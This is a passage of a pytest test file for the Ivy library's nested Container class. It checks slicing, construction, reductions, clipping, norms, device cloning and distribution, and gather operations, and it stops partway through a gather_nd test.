    assert "a" not in cont_sliced
    assert np.allclose(ivy.to_numpy(cont_sliced.b), ivy.to_numpy(b_val))
    assert np.allclose(ivy.to_numpy(cont_sliced.c), ivy.to_numpy(c_val))
    assert np.allclose(ivy.to_numpy(cont_sliced.d), ivy.to_numpy(d_val))
    assert "e" not in cont_sliced
    # with dict, depth 0
    sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
    cont = Container(
        {"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
    )
    cont_sliced = cont.slice_keys({0: slc})
    # Only top-level keys are sliced; the surviving sub-containers are intact.
    assert "a" not in cont_sliced
    assert Container.identical([cont_sliced.b, sub_cont])
    assert Container.identical([cont_sliced.c, sub_cont])
    assert Container.identical([cont_sliced.d, sub_cont])
    assert "e" not in cont_sliced
    # with dict, depth 1
    sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
    sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
    cont = Container(
        {"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
    )
    cont_sliced = cont.slice_keys({1: slc})
    # Top level untouched; each sub-container is sliced down to b/c/d.
    assert Container.identical([cont_sliced.a, sub_sub_cont])
    assert Container.identical([cont_sliced.b, sub_sub_cont])
    assert Container.identical([cont_sliced.c, sub_sub_cont])
    assert Container.identical([cont_sliced.d, sub_sub_cont])
    assert Container.identical([cont_sliced.e, sub_sub_cont])
    # with dict, depth 0, 1
    sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
    sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
    cont = Container(
        {"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
    )
    cont_sliced = cont.slice_keys({0: slc, 1: slc})
    assert "a" not in cont_sliced
    assert Container.identical([cont_sliced.b, sub_sub_cont])
    assert Container.identical([cont_sliced.c, sub_sub_cont])
    assert Container.identical([cont_sliced.d, sub_sub_cont])
    assert "e" not in cont_sliced
    # all depths
    sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
    sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
    cont = Container(
        {"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
    )
    cont_sliced = cont.slice_keys(slc, all_depths=True)
    assert "a" not in cont_sliced
    assert Container.identical([cont_sliced.b, sub_sub_cont])
    assert Container.identical([cont_sliced.c, sub_sub_cont])
    assert Container.identical([cont_sliced.d, sub_sub_cont])
    assert "e" not in cont_sliced
def test_container_show(device, call):
    """Smoke-test printing and calling show() on a nested container."""
    if call is helpers.mx_call:
        # ToDo: get this working for mxnet again, recent version update caused errors.
        pytest.skip()
    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    print(container)
    container.show()
def test_container_find_sub_container(device, call):
    """Locate full and partial sub-containers by identity of their leaves."""
    arr1 = ivy.array([1], device=device)
    arr2 = ivy.array([2], device=device)
    arr3 = ivy.array([3], device=device)
    top_cont = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
    # full containment: the "b" sub-tree, and the container within itself
    sub_cont = Container({"c": arr2, "d": arr3})
    assert sub_cont in top_cont
    assert top_cont.find_sub_container(sub_cont) == "b"
    assert top_cont.find_sub_container(top_cont) == ""
    # partial containment: a subset of a sub-tree's keys still resolves
    partial_sub_cont = Container({"d": arr3})
    assert top_cont.find_sub_container(partial_sub_cont, partial=True) == "b"
    assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
    partial_sub_cont = Container({"b": {"d": arr3}})
    assert top_cont.find_sub_container(partial_sub_cont, partial=True) == ""
    assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
def test_container_find_sub_structure(device, call):
    """Locate sub-containers by structure (keys) rather than leaf values."""
    top_cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    # full structural match: values differ, key structure matches
    sub_cont = Container(
        {"c": ivy.array([4], device=device), "d": ivy.array([5], device=device)}
    )
    assert not top_cont.find_sub_container(sub_cont)
    assert top_cont.find_sub_structure(sub_cont) == "b"
    assert top_cont.find_sub_structure(top_cont) == ""
    # partial structural match
    partial_sub_cont = Container({"d": ivy.array([5], device=device)})
    assert top_cont.find_sub_structure(partial_sub_cont, partial=True) == "b"
    partial_sub_cont = Container({"b": {"d": ivy.array([5], device=device)}})
    assert top_cont.find_sub_structure(partial_sub_cont, partial=True) == ""
def test_container_show_sub_container(device, call):
    """Smoke-test show_sub_container with a key and with a container argument."""
    if call is helpers.mx_call:
        # ToDo: get this working for mxnet again, recent version update caused errors.
        pytest.skip()
    arr_c = ivy.array([2], device=device)
    arr_d = ivy.array([3], device=device)
    top_cont = Container(
        {"a": ivy.array([1], device=device), "b": {"c": arr_c, "d": arr_d}}
    )
    sub_cont = Container({"c": arr_c, "d": arr_d})
    top_cont.show_sub_container("b")
    top_cont.show_sub_container(sub_cont)
def test_container_from_dict_w_cont_types(device, call):
    """Container construction accepts mapping types such as haiku FlatMapping."""
    # ToDo: add tests for backends other than jax
    if call is not helpers.jnp_call:
        pytest.skip()
    from haiku._src.data_structures import FlatMapping

    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": FlatMapping(
                {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)}
            ),
        }
    )
    # verify both item-style and attribute-style access to each leaf
    for leaf, want in (
        (container["a"], 1),
        (container.a, 1),
        (container["b"]["c"], 2),
        (container.b.c, 2),
        (container["b"]["d"], 3),
        (container.b.d, 3),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([want]))
def test_container_from_kwargs(device, call):
    """Container construction from keyword arguments mirrors dict construction."""
    container = Container(
        a=ivy.array([1], device=device),
        b={"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
    )
    # verify both item-style and attribute-style access to each leaf
    for leaf, want in (
        (container["a"], 1),
        (container.a, 1),
        (container["b"]["c"], 2),
        (container.b.c, 2),
        (container["b"]["d"], 3),
        (container.b.d, 3),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([want]))
def test_container_from_list(device, call):
    """Nested lists become containers with auto-generated it_N keys."""
    container = Container(
        [
            ivy.array([1], device=device),
            [ivy.array([2], device=device), ivy.array([3], device=device)],
        ],
        types_to_iteratively_nest=[list],
    )
    for leaf, want in (
        (container["it_0"], 1),
        (container.it_0, 1),
        (container["it_1"]["it_0"], 2),
        (container.it_1.it_0, 2),
        (container["it_1"]["it_1"], 3),
        (container.it_1.it_1, 3),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([want]))
def test_container_from_tuple(device, call):
    """Nested tuples become containers with auto-generated it_N keys."""
    container = Container(
        (
            ivy.array([1], device=device),
            (ivy.array([2], device=device), ivy.array([3], device=device)),
        ),
        types_to_iteratively_nest=[tuple],
    )
    for leaf, want in (
        (container["it_0"], 1),
        (container.it_0, 1),
        (container["it_1"]["it_0"], 2),
        (container.it_1.it_0, 2),
        (container["it_1"]["it_1"], 3),
        (container.it_1.it_1, 3),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([want]))
def test_container_to_raw(device, call):
    """to_raw round-trips an iteratively-nested tuple back to raw structure."""
    container = Container(
        (
            ivy.array([1], device=device),
            (ivy.array([2], device=device), ivy.array([3], device=device)),
        ),
        types_to_iteratively_nest=[tuple],
    )
    raw = container.to_raw()
    for value, want in ((raw[0], 1), (raw[1][0], 2), (raw[1][1], 3)):
        assert np.allclose(ivy.to_numpy(value), np.array([want]))
def test_container_sum(device, call):
    """sum() reduces each leaf array to its scalar sum."""
    container = Container(
        {
            "a": ivy.array([1.0, 2.0, 3.0], device=device),
            "b": {
                "c": ivy.array([2.0, 4.0, 6.0], device=device),
                "d": ivy.array([3.0, 6.0, 9.0], device=device),
            },
        }
    )
    summed = container.sum()
    for leaf, want in (
        (summed["a"], 6.0),
        (summed.a, 6.0),
        (summed["b"]["c"], 12.0),
        (summed.b.c, 12.0),
        (summed["b"]["d"], 18.0),
        (summed.b.d, 18.0),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([want]))
def test_container_prod(device, call):
    """prod() reduces each leaf array to its scalar product."""
    container = Container(
        {
            "a": ivy.array([1.0, 2.0, 3.0], device=device),
            "b": {
                "c": ivy.array([2.0, 4.0, 6.0], device=device),
                "d": ivy.array([3.0, 6.0, 9.0], device=device),
            },
        }
    )
    prodded = container.prod()
    for leaf, want in (
        (prodded["a"], 6.0),
        (prodded.a, 6.0),
        (prodded["b"]["c"], 48.0),
        (prodded.b.c, 48.0),
        (prodded["b"]["d"], 162.0),
        (prodded.b.d, 162.0),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([want]))
def test_container_mean(device, call):
    """mean() reduces each leaf array to its scalar mean."""
    container = Container(
        {
            "a": ivy.array([1.0, 2.0, 3.0], device=device),
            "b": {
                "c": ivy.array([2.0, 4.0, 6.0], device=device),
                "d": ivy.array([3.0, 6.0, 9.0], device=device),
            },
        }
    )
    meaned = container.mean()
    for leaf, want in (
        (meaned["a"], 2.0),
        (meaned.a, 2.0),
        (meaned["b"]["c"], 4.0),
        (meaned.b.c, 4.0),
        (meaned["b"]["d"], 6.0),
        (meaned.b.d, 6.0),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([want]))
def test_container_var(device, call):
    """var() reduces each leaf to its population variance."""
    container = Container(
        {
            "a": ivy.array([1.0, 2.0, 3.0], device=device),
            "b": {
                "c": ivy.array([2.0, 4.0, 6.0], device=device),
                "d": ivy.array([3.0, 6.0, 9.0], device=device),
            },
        }
    )
    varred = container.var()
    # population variances: var([1,2,3]) = 2/3, var([2,4,6]) = 8/3, var([3,6,9]) = 6
    for leaf, want in (
        (varred["a"], 2 / 3),
        (varred.a, 2 / 3),
        (varred["b"]["c"], 8 / 3),
        (varred.b.c, 8 / 3),
        (varred["b"]["d"], 6.0),
        (varred.b.d, 6.0),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([want]))
def test_container_std(device, call):
    """std() reduces each leaf to the square root of its population variance."""
    container = Container(
        {
            "a": ivy.array([1.0, 2.0, 3.0], device=device),
            "b": {
                "c": ivy.array([2.0, 4.0, 6.0], device=device),
                "d": ivy.array([3.0, 6.0, 9.0], device=device),
            },
        }
    )
    stddevs = container.std()
    # expected values are sqrt of the corresponding population variances
    for leaf, variance in (
        (stddevs["a"], 2 / 3),
        (stddevs.a, 2 / 3),
        (stddevs["b"]["c"], 8 / 3),
        (stddevs.b.c, 8 / 3),
        (stddevs["b"]["d"], 6.0),
        (stddevs.b.d, 6.0),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([variance]) ** 0.5)
def test_container_minimum(device, call):
    """minimum() clamps leaves against a scalar or elementwise against another container."""
    container = Container(
        {
            "a": ivy.array([1.0, 2.0, 3.0], device=device),
            "b": {
                "c": ivy.array([2.0, 4.0, 6.0], device=device),
                "d": ivy.array([3.0, 6.0, 9.0], device=device),
            },
        }
    )
    other = Container(
        {
            "a": ivy.array([2.0, 3.0, 2.0], device=device),
            "b": {
                "c": ivy.array([1.0, 5.0, 4.0], device=device),
                "d": ivy.array([4.0, 7.0, 8.0], device=device),
            },
        }
    )

    def _check(result, want_a, want_c, want_d):
        # each leaf is checked via both item-style and attribute-style access
        for leaf, want in (
            (result["a"], want_a),
            (result.a, want_a),
            (result["b"]["c"], want_c),
            (result.b.c, want_c),
            (result["b"]["d"], want_d),
            (result.b.d, want_d),
        ):
            assert np.allclose(ivy.to_numpy(leaf), np.array(want))

    # against number
    _check(
        container.minimum(5.0), [1.0, 2.0, 3.0], [2.0, 4.0, 5.0], [3.0, 5.0, 5.0]
    )
    # against container
    _check(
        container.minimum(other), [1.0, 2.0, 2.0], [1.0, 4.0, 4.0], [3.0, 6.0, 8.0]
    )
def test_container_maximum(device, call):
    """maximum() clamps leaves against a scalar or elementwise against another container."""
    container = Container(
        {
            "a": ivy.array([1.0, 2.0, 3.0], device=device),
            "b": {
                "c": ivy.array([2.0, 4.0, 6.0], device=device),
                "d": ivy.array([3.0, 6.0, 9.0], device=device),
            },
        }
    )
    other = Container(
        {
            "a": ivy.array([2.0, 3.0, 2.0], device=device),
            "b": {
                "c": ivy.array([1.0, 5.0, 4.0], device=device),
                "d": ivy.array([4.0, 7.0, 8.0], device=device),
            },
        }
    )

    def _check(result, want_a, want_c, want_d):
        # each leaf is checked via both item-style and attribute-style access
        for leaf, want in (
            (result["a"], want_a),
            (result.a, want_a),
            (result["b"]["c"], want_c),
            (result.b.c, want_c),
            (result["b"]["d"], want_d),
            (result.b.d, want_d),
        ):
            assert np.allclose(ivy.to_numpy(leaf), np.array(want))

    # against number
    _check(
        container.maximum(4.0), [4.0, 4.0, 4.0], [4.0, 4.0, 6.0], [4.0, 6.0, 9.0]
    )
    # against container
    _check(
        container.maximum(other), [2.0, 3.0, 3.0], [2.0, 5.0, 6.0], [4.0, 7.0, 9.0]
    )
def test_container_clip(device, call):
    """clip() bounds leaves by scalars or elementwise by min/max containers."""
    container = Container(
        {
            "a": ivy.array([1.0, 2.0, 3.0], device=device),
            "b": {
                "c": ivy.array([2.0, 4.0, 6.0], device=device),
                "d": ivy.array([3.0, 6.0, 9.0], device=device),
            },
        }
    )
    container_min = Container(
        {
            "a": ivy.array([2.0, 0.0, 0.0], device=device),
            "b": {
                "c": ivy.array([0.0, 5.0, 0.0], device=device),
                "d": ivy.array([4.0, 7.0, 0.0], device=device),
            },
        }
    )
    container_max = Container(
        {
            "a": ivy.array([3.0, 1.0, 2.0], device=device),
            "b": {
                "c": ivy.array([1.0, 7.0, 5.0], device=device),
                "d": ivy.array([5.0, 8.0, 8.0], device=device),
            },
        }
    )

    def _check(result, want_a, want_c, want_d):
        # each leaf is checked via both item-style and attribute-style access
        for leaf, want in (
            (result["a"], want_a),
            (result.a, want_a),
            (result["b"]["c"], want_c),
            (result.b.c, want_c),
            (result["b"]["d"], want_d),
            (result.b.d, want_d),
        ):
            assert np.allclose(ivy.to_numpy(leaf), np.array(want))

    # against number
    _check(
        container.clip(2.0, 6.0), [2.0, 2.0, 3.0], [2.0, 4.0, 6.0], [3.0, 6.0, 6.0]
    )
    if call is helpers.mx_call:
        # MXNet clip does not support arrays for the min and max arguments
        return
    # against container
    _check(
        container.clip(container_min, container_max),
        [2.0, 1.0, 2.0],
        [1.0, 5.0, 5.0],
        [4.0, 7.0, 8.0],
    )
def test_container_clip_vector_norm(device, call):
    """clip_vector_norm rescales each leaf so its p-norm does not exceed the cap."""
    container = Container({"a": ivy.array([[0.8, 2.2], [1.5, 0.2]], device=device)})
    clipped = container.clip_vector_norm(2.5, 2.0)
    expected = np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]])
    assert np.allclose(ivy.to_numpy(clipped["a"]), expected)
    assert np.allclose(ivy.to_numpy(clipped.a), expected)
def test_container_einsum(device, call):
    """einsum('ij->i') sums each leaf matrix across its rows."""
    container = Container(
        {
            "a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
            "b": {
                "c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
                "d": ivy.array(
                    [[-2.0, -4.0], [-6.0, -8.0], [-10.0, -12.0]], device=device
                ),
            },
        }
    )
    summed = container.einsum("ij->i")
    for leaf, want in (
        (summed["a"], [3.0, 7.0, 11.0]),
        (summed.a, [3.0, 7.0, 11.0]),
        (summed["b"]["c"], [6.0, 14.0, 22.0]),
        (summed.b.c, [6.0, 14.0, 22.0]),
        (summed["b"]["d"], [-6.0, -14.0, -22.0]),
        (summed.b.d, [-6.0, -14.0, -22.0]),
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array(want))
# def test_container_vector_norm(device, call):
# dict_in = {
# "a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
# "b": {
# "c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
# "d": ivy.array([[3.0, 6.0], [9.0, 12.0], [15.0, 18.0]], device=device),
# },
# }
# container = Container(dict_in)
# container_normed = container.vector_norm(axis=(-1, -2))
# assert np.allclose(ivy.to_numpy(container_normed["a"]), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed.a), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed["b"]["c"]), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed["b"]["d"]), 28.6182)
# assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.6182)
def test_container_matrix_norm(device, call):
    """matrix_norm() reduces each leaf matrix to its (Frobenius) norm."""
    if call is helpers.mx_call:
        # MXNet does not support matrix norm
        pytest.skip()
    container = Container(
        {
            "a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
            "b": {
                "c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
                "d": ivy.array([[3.0, 6.0], [9.0, 12.0], [15.0, 18.0]], device=device),
            },
        }
    )
    normed = container.matrix_norm()
    for leaf, want in (
        (normed["a"], 9.52551809),
        (normed.a, 9.52551809),
        (normed["b"]["c"], 19.05103618),
        (normed.b.c, 19.05103618),
        (normed["b"]["d"], 28.57655427),
        (normed.b.d, 28.57655427),
    ):
        assert np.allclose(ivy.to_numpy(leaf), want)
def test_container_flip(device, call):
    """flip(-1) reverses each leaf along its last axis."""
    container = Container(
        {
            "a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
            "b": {
                "c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
                "d": ivy.array(
                    [[-2.0, -4.0], [-6.0, -8.0], [-10.0, -12.0]], device=device
                ),
            },
        }
    )
    flipped = container.flip(-1)
    want_a = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]])
    want_c = np.array([[4.0, 2.0], [8.0, 6.0], [12.0, 10.0]])
    want_d = np.array([[-4.0, -2.0], [-8.0, -6.0], [-12.0, -10.0]])
    for leaf, want in (
        (flipped["a"], want_a),
        (flipped.a, want_a),
        (flipped["b"]["c"], want_c),
        (flipped.b.c, want_c),
        (flipped["b"]["d"], want_d),
        (flipped.b.d, want_d),
    ):
        assert np.allclose(ivy.to_numpy(leaf), want)
def test_container_as_ones(device, call):
    """as_ones() replaces every leaf with a same-shaped array of ones."""
    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    ones = container.as_ones()
    for leaf in (ones["a"], ones.a, ones["b"]["c"], ones.b.c, ones["b"]["d"], ones.b.d):
        assert np.allclose(ivy.to_numpy(leaf), np.array([1]))
def test_container_as_zeros(device, call):
    """as_zeros() replaces every leaf with a same-shaped array of zeros."""
    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    zeros = container.as_zeros()
    for leaf in (
        zeros["a"],
        zeros.a,
        zeros["b"]["c"],
        zeros.b.c,
        zeros["b"]["d"],
        zeros.b.d,
    ):
        assert np.allclose(ivy.to_numpy(leaf), np.array([0]))
def test_container_as_bools(device, call):
    """as_bools() maps each leaf to its Python truth value."""
    container = Container({"a": ivy.array([1], device=device), "b": {"c": [], "d": True}})
    bools = container.as_bools()
    # truthy leaves (non-empty array, True)
    for leaf in (bools["a"], bools.a, bools["b"]["d"], bools.b.d):
        assert leaf is True
    # falsy leaf (empty list)
    for leaf in (bools["b"]["c"], bools.b.c):
        assert leaf is False
def test_container_all_true(device, call):
    """all_true() is False when any leaf is falsy, True when all are truthy,
    and raises AssertionError under assert_is_bool=True for non-bool leaves.

    The previous try/except/flag pattern could pass even when ``all_true``
    itself raised nothing: if it merely returned ``False``, the outer
    ``assert`` raised the AssertionError that set the flag.  ``pytest.raises``
    pins the error to the ``all_true`` call itself.
    """
    assert not Container(
        {"a": ivy.array([1], device=device), "b": {"c": [], "d": True}}
    ).all_true()
    assert Container(
        {"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
    ).all_true()
    # non-boolean leaves (array, list) must trigger the is-bool assertion
    with pytest.raises(AssertionError):
        Container(
            {"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
        ).all_true(assert_is_bool=True)
def test_container_all_false(device, call):
    """all_false() is True only when every leaf is falsy, and raises
    AssertionError under assert_is_bool=True for non-bool leaves.

    Uses ``pytest.raises`` instead of the try/except/flag pattern, which
    could pass even when the AssertionError came from the outer ``assert``
    rather than from ``all_false`` itself.
    """
    assert Container({"a": False, "b": {"c": [], "d": 0}}).all_false()
    assert not Container({"a": False, "b": {"c": [1], "d": 0}}).all_false()
    # non-boolean leaves (array, list) must trigger the is-bool assertion
    with pytest.raises(AssertionError):
        Container(
            {"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
        ).all_false(assert_is_bool=True)
def test_container_as_random_uniform(device, call):
    """as_random_uniform() replaces each leaf with fresh random values."""
    container = Container(
        {
            "a": ivy.array([1.0], device=device),
            "b": {
                "c": ivy.array([2.0], device=device),
                "d": ivy.array([3.0], device=device),
            },
        }
    )
    randomized = container.as_random_uniform()
    # each randomised leaf should differ from its original value
    for leaf, original in (
        (randomized["a"], 1.0),
        (randomized.a, 1.0),
        (randomized["b"]["c"], 2.0),
        (randomized.b.c, 2.0),
        (randomized["b"]["d"], 3.0),
        (randomized.b.d, 3.0),
    ):
        assert (ivy.to_numpy(leaf) != np.array([original]))[0]
def test_container_expand_dims(device, call):
    """expand_dims(0) adds a leading axis, optionally restricted by key chains."""
    container = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )

    def _check(leaves, want):
        # verify every access path to a leaf yields the expected array
        for leaf in leaves:
            assert np.allclose(ivy.to_numpy(leaf), np.array(want))

    # without key_chains specification
    expanded = container.expand_dims(0)
    _check([expanded["a"], expanded.a], [[1]])
    _check([expanded["b"]["c"], expanded.b.c], [[2]])
    _check([expanded["b"]["d"], expanded.b.d], [[3]])
    # with key_chains to apply
    expanded = container.expand_dims(0, ["a", "b/c"])
    _check([expanded["a"], expanded.a], [[1]])
    _check([expanded["b"]["c"], expanded.b.c], [[2]])
    _check([expanded["b"]["d"], expanded.b.d], [3])
    # with key_chains to apply pruned
    expanded = container.expand_dims(0, ["a", "b/c"], prune_unapplied=True)
    _check([expanded["a"], expanded.a], [[1]])
    _check([expanded["b"]["c"], expanded.b.c], [[2]])
    assert "b/d" not in expanded
    # with key_chains to not apply
    expanded = container.expand_dims(
        0, Container({"a": None, "b": {"d": None}}), to_apply=False
    )
    _check([expanded["a"], expanded.a], [1])
    _check([expanded["b"]["c"], expanded.b.c], [[2]])
    _check([expanded["b"]["d"], expanded.b.d], [3])
    # with key_chains to not apply pruned
    expanded = container.expand_dims(
        0,
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
        prune_unapplied=True,
    )
    assert "a" not in expanded
    _check([expanded["b"]["c"], expanded.b.c], [[2]])
    assert "b/d" not in expanded
def test_container_clone(device, call):
    """dev_clone replicates a container across devices: each clone reports its
    target device and all clones hold equal arrays."""
    container = Container(
        {
            "a": ivy.array([[1], [2], [3]], device=device),
            "b": {
                "c": ivy.array([[2], [3], [4]], device=device),
                "d": ivy.array([[3], [4], [5]], device=device),
            },
        }
    )
    # target devices: always the current one, plus the last GPU when several exist
    devices = [device]
    if "gpu" in device and ivy.num_gpus() > 1:
        idx = ivy.num_gpus() - 1
        devices.append(device[:-1] + str(idx))
    # without key_chains specification
    container_cloned = container.dev_clone(devices)
    assert isinstance(container_cloned, ivy.DevClonedItem)
    # all() is the idiomatic form of min() over a list of bools and does not
    # raise ValueError on an empty mapping
    assert all(cont.dev_str == ds for ds, cont in container_cloned.items())
    assert ivy.Container.multi_map(
        lambda xs, _: ivy.arrays_equal(xs), [c for c in container_cloned.values()]
    ).all_true()
@pytest.mark.parametrize("devs_as_dict", [True, False])
def test_container_distribute(devs_as_dict, device, call):
    """dev_dist splits a container batch-wise across devices; each shard lives
    on its target device and holds the matching slice of every leaf."""
    array_a = ivy.array([[1], [2], [3], [4]], device=device)
    array_bc = ivy.array([[2], [3], [4], [5]], device=device)
    array_bd = ivy.array([[3], [4], [5], [6]], device=device)
    container = Container({"a": array_a, "b": {"c": array_bc, "d": array_bd}})
    batch_size = array_a.shape[0]
    if call is helpers.mx_call:
        # MXNet does not support splitting along an axis with a remainder after division
        pytest.skip()
    # target devices: always the current one, plus the last GPU when several exist
    devices = [device]
    if "gpu" in device and ivy.num_gpus() > 1:
        idx = ivy.num_gpus() - 1
        devices.append(device[:-1] + str(idx))
    if devs_as_dict:
        # dict form maps each device to its per-device batch share
        devices = dict(zip(devices, [int((1 / len(devices)) * 4)] * len(devices)))
    num_devs = len(devices)
    sub_size = int(batch_size / num_devs)
    # without key_chains specification
    container_dist = container.dev_dist(devices)
    assert isinstance(container_dist, ivy.DevDistItem)
    # all() is the idiomatic form of min() over a list of bools and does not
    # raise ValueError on an empty mapping
    assert all(cont.dev_str == ds for ds, cont in container_dist.items())
    for i, sub_cont in enumerate(container_dist.values()):
        start = i * sub_size
        assert np.array_equal(
            ivy.to_numpy(sub_cont.a),
            ivy.to_numpy(array_a)[start : start + sub_size],
        )
        assert np.array_equal(
            ivy.to_numpy(sub_cont.b.c),
            ivy.to_numpy(array_bc)[start : start + sub_size],
        )
        assert np.array_equal(
            ivy.to_numpy(sub_cont.b.d),
            ivy.to_numpy(array_bd)[start : start + sub_size],
        )
def test_container_unstack(device, call):
    """unstack(0) yields one container per slice along the leading axis."""
    container = Container(
        {
            "a": ivy.array([[1], [2], [3]], device=device),
            "b": {
                "c": ivy.array([[2], [3], [4]], device=device),
                "d": ivy.array([[3], [4], [5]], device=device),
            },
        }
    )
    # without key_chains specification
    expected_slices = [(1, 2, 3), (2, 3, 4), (3, 4, 5)]
    for cont, (a, bc, bd) in zip(container.unstack(0), expected_slices):
        for leaf, want in (
            (cont["a"], a),
            (cont.a, a),
            (cont["b"]["c"], bc),
            (cont.b.c, bc),
            (cont["b"]["d"], bd),
            (cont.b.d, bd),
        ):
            assert np.array_equal(ivy.to_numpy(leaf), np.array([want]))
def test_container_split(device, call):
    """split(1, -1) yields one container per unit chunk along the last axis."""
    container = Container(
        {
            "a": ivy.array([[1], [2], [3]], device=device),
            "b": {
                "c": ivy.array([[2], [3], [4]], device=device),
                "d": ivy.array([[3], [4], [5]], device=device),
            },
        }
    )
    # without key_chains specification
    expected_chunks = [(1, 2, 3), (2, 3, 4), (3, 4, 5)]
    for cont, (a, bc, bd) in zip(container.split(1, -1), expected_chunks):
        for leaf, want in (
            (cont["a"], a),
            (cont.a, a),
            (cont["b"]["c"], bc),
            (cont.b.c, bc),
            (cont["b"]["d"], bd),
            (cont.b.d, bd),
        ):
            assert np.array_equal(ivy.to_numpy(leaf)[0], np.array([want]))
def test_container_gather(device, call):
    """gather() indexes each leaf, optionally restricted by key chains."""
    container = Container(
        {
            "a": ivy.array([1, 2, 3, 4, 5, 6], device=device),
            "b": {
                "c": ivy.array([2, 3, 4, 5], device=device),
                "d": ivy.array([10, 9, 8, 7, 6], device=device),
            },
        }
    )

    def _check(leaves, want):
        # verify every access path to a leaf yields the expected array
        for leaf in leaves:
            assert np.allclose(ivy.to_numpy(leaf), np.array(want))

    # without key_chains specification
    gathered = container.gather(ivy.array([1, 3], device=device))
    _check([gathered["a"], gathered.a], [2, 4])
    _check([gathered["b"]["c"], gathered.b.c], [3, 5])
    _check([gathered["b"]["d"], gathered.b.d], [9, 7])
    # with key_chains to apply
    gathered = container.gather(ivy.array([1, 3], device=device), -1, ["a", "b/c"])
    _check([gathered["a"], gathered.a], [2, 4])
    _check([gathered["b"]["c"], gathered.b.c], [3, 5])
    _check([gathered["b"]["d"], gathered.b.d], [10, 9, 8, 7, 6])
    # with key_chains to apply pruned
    gathered = container.gather(
        ivy.array([1, 3], device=device), -1, ["a", "b/c"], prune_unapplied=True
    )
    _check([gathered["a"], gathered.a], [2, 4])
    _check([gathered["b"]["c"], gathered.b.c], [3, 5])
    assert "b/d" not in gathered
    # with key_chains to not apply
    gathered = container.gather(
        ivy.array([1, 3], device=device),
        -1,
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
    )
    _check([gathered["a"], gathered.a], [1, 2, 3, 4, 5, 6])
    _check([gathered["b"]["c"], gathered.b.c], [3, 5])
    _check([gathered["b"]["d"], gathered.b.d], [10, 9, 8, 7, 6])
    # with key_chains to not apply pruned
    gathered = container.gather(
        ivy.array([1, 3], device=device),
        -1,
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
        prune_unapplied=True,
    )
    assert "a" not in gathered
    _check([gathered["b"]["c"], gathered.b.c], [3, 5])
    assert "b/d" not in gathered
def test_container_gather_nd(device, call):
    """Test ``Container.gather_nd`` across the key-chain selection modes.

    Covers: applying to all leaves; restricting to selected chains via
    ``key_chains`` (with and without ``prune_unapplied``); and excluding
    chains via ``to_apply=False`` (with and without pruning).  Unapplied
    leaves are either passed through unchanged or pruned from the result.
    """
    dict_in = {
        "a": ivy.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]], device=device),
        "b": {
            "c": ivy.array([[[8, 7], [6, 5]], [[4, 3], [2, 1]]], device=device),
